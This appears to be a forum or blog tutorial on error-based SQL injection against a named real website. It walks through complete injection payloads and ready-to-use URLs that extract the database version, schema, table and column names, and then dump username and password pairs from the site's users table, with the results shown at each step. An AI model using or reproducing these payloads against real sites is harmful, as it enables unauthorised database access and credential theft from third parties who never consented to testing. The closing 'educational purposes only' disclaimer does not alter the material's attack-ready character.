Hey guys,
I'll be explaining another type of Error Based SQL injection.
It's definitely another type but in this case, I call it Union-Error based, since it involves Union Select in the queries we're about to use.
So let's get started
In this example we're gonna be using this site (which was asked by a member in -Downfall's thread):
http://www.seenpm.org/
The vulnerable link would be:
http://www.seenpm.org/new/index.php?id=151'
Before I go further, let me explain some of the SQL functions we're gonna be using in this tutorial, so that you'll have an idea how the query works. Please read carefully
count(*) = Returns the total number of records in the table/view
group by = Groups the result of the query set by one or more columns
concat = shows the results in one column
information_schema = The default database
table_schema = Specified database
table_name = The current table name
limit = Limits the amount of content to be displayed
mid() = Used to extract characters from a text fieldSee more of the functions here:
http://www.w3schools.com/sql/sql_functions.asp
NOTE: Make sure to organize the query if you're just gonna copy and paste!
There could be some spaces in between
Getting the version of their database (2 main ways to do it):
First way:
Query:
+AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2)))
URL will look like:
http://www.seenpm.org/new/index.php?id=151+AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2)))
Results:
Duplicate entry '5.1.54-msl-usrs-sure2-log1' for key 'group_key'
Second way:
Query:
+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ 3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_ schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)-- x
URL will look like:
http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select +2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+f rom+information_schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)-- x
Results:
Duplicate entry '5.1.54-msl-usrs-sure2-log1' for key 'group_key'
Screenshot:
![[Image: lOnau.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_shGX9lz7QPXW-Mr6NkHWvsepmMxFaoev-u7BvdYpJS0j1MKNOKO-OZgOBtqJLdYrI10VPCmwKVPpzK_sbBy8reU_5PU1h4FKGDyAAJayg-NbzWTkQ=s0-d)
Now that we've got the version, let's extract the database:
Query used:
+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ 3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(schema_name),0x7e)+f rom+information_schema.schemata limit+0,1),1,25),floor(rand(0)*2)))a)-- x
URL will look like this:
http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select +2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(sche ma_name),0x7e)+from+information_schema.schemata limit+0,1),1,25),floor(rand(0)*2)))a)-- x
Results:
Duplicate entry 'information_schema,seenpm_2007~~1' for key 'group_key'
Note: Notice the limit 0,1),1,150)
This is the part where I raised the ascii from 25 to 150, just in case there would have been more database
I'll explain more about the mid() function in the next step
Screenshot:
![[Image: QxgVN.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_srw2u_3rBqBUNy57PZq9exKPvTnDwl4UrRWmSB4tRZEWDiUOQjh6ChbO9bi9VeHdj_J9Sbxz9_Lrfp_pnH1I30r9zNptSh1GU9T5CDa2YGPT6Ral0=s0-d)
We have the database and version so far
Now for the tables in their current database
Query:
+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ 3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(table_name),0x7e)+fr om+information_schema.tables where table_schema=database() limit+0,1),1,25),floor(rand(0)*2)))a)-- x
URL:
http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select +2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(tabl e_name),0x7e)+from+information_schema.tables where table_schema=database() limit+0,1),1,25),floor(rand(0)*2)))a)-- x
Results:
'links,members,menu,menu_s1' for key 'group_key'
Now read this carefully, notice how the tables aren't completely shown.
Only about half of em are shown. This is because of the mid() function we're using.
Leave the limit 0,1 function and don't touch it
What you need to alter now is the integers of the mid() function
i.e (mid((select+concat_ws(0x7e,group_concat(table_name),0x7e)+from+information_sche ma.tables where table_schema=database() limit+0,1),1,25)
Yes, that's right. Notice 1,25
25 can also be altered, however it's a moderate value, so leave it like that
Now, the number "1" shows the tables as soon as it's being altered.
Incrementing is what's being needed here
Lets just say, 15,25
It'll display the rest of the other tables
I've done a bit of a reckon on the site and found out that the 'users' table is located at 58,25
So the query with the URL will look like:
http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select +2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(tabl e_name),0x7e)+from+information_schema.tables where table_schema=database() limit+0,1),58,25),floor(rand(0)*2)))a)-- x
Results:
Duplicate entry 'ers,u_page,u_par,users~~1' for key 'group_key'
Screenshot:
![[Image: AVmxf.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sbNs3vDfGI4WUcuUcyeUCwN6faQs0tQE48PKbOttWq2Rf81dlrsBMrnVKJ5oOwhR05QyRaxwUJDPxuTr4Owov5SRPYxKVMJxJHWx4Oij3Zno86cw=s0-d)
Now for the columns in the specified table i.e users
Query:
+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ 3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(column_name),0x7e)+f rom+information_schema.columns where table_name=0xHex_Table limit+0,1),1,25),floor(rand(0)*2)))a)-- x
Notice you have to convert the current table to Hex.
To do that, you can go to http://www.swingnote.com/tools/texttohex.php
URL:
http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select +2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(colu mn_name),0x7e)+from+information_schema.columns where table_name=0x7573657273 limit+0,1),1,25),floor(rand(0)*2)))a)-- x
Now notice the mid() function
I've incremented from 1,25 to 4,25
Result:
'username,password,email,n1' for key 'group_key'
Screenshot:
![[Image: oOnBR.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vhb-VyTucTMZjD8ndhpFUiIvxAQ64cZqzqeYyLfSx2McFiRv6Ua2zZDZmON54GGw_ubjOT4IzmKDjE8NGfe8zb6SPLIFYt1hPi6ofWQ44PtATwMU4=s0-d)
Now to extract the data from the desired columns
Columns we have so far: "username", "password"
Query:
+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ 3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(username,0x3a,passwo rd),0x7e)+from+users limit+0,1),1,25),floor(rand(0)*2)))a)-- x
URL:
http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select +2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(user name,0x3a,password),0x7e)+from+users limit+0,1),1,25),floor(rand(0)*2)))a)-- x
Results:
Duplicate entry 'admin:admin,test:test~~1' for key 'group_key'
Notice how I didn't increment the mid() function
This because the content is completely shown
Note: You can know that the data is completely shown when there is a ~ sign or signs
Screenshot:
![[Image: 057wa.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_skq0-qj7T7YDyZT82Zs9BcbO6534834sYQDbUA9ZS4UqEXKmVniQbYCMfeiR3UDQHPMOetFEQBWUOyUOYJNpP9RQIer_qjJ6Jc0ZI0WNEOlz3O7g=s0-d)
All information on this forum is for educational purposes only.
WE are not responsible for any attacks that are carried out on networks, websites or servers.
0 comments:
Post a Comment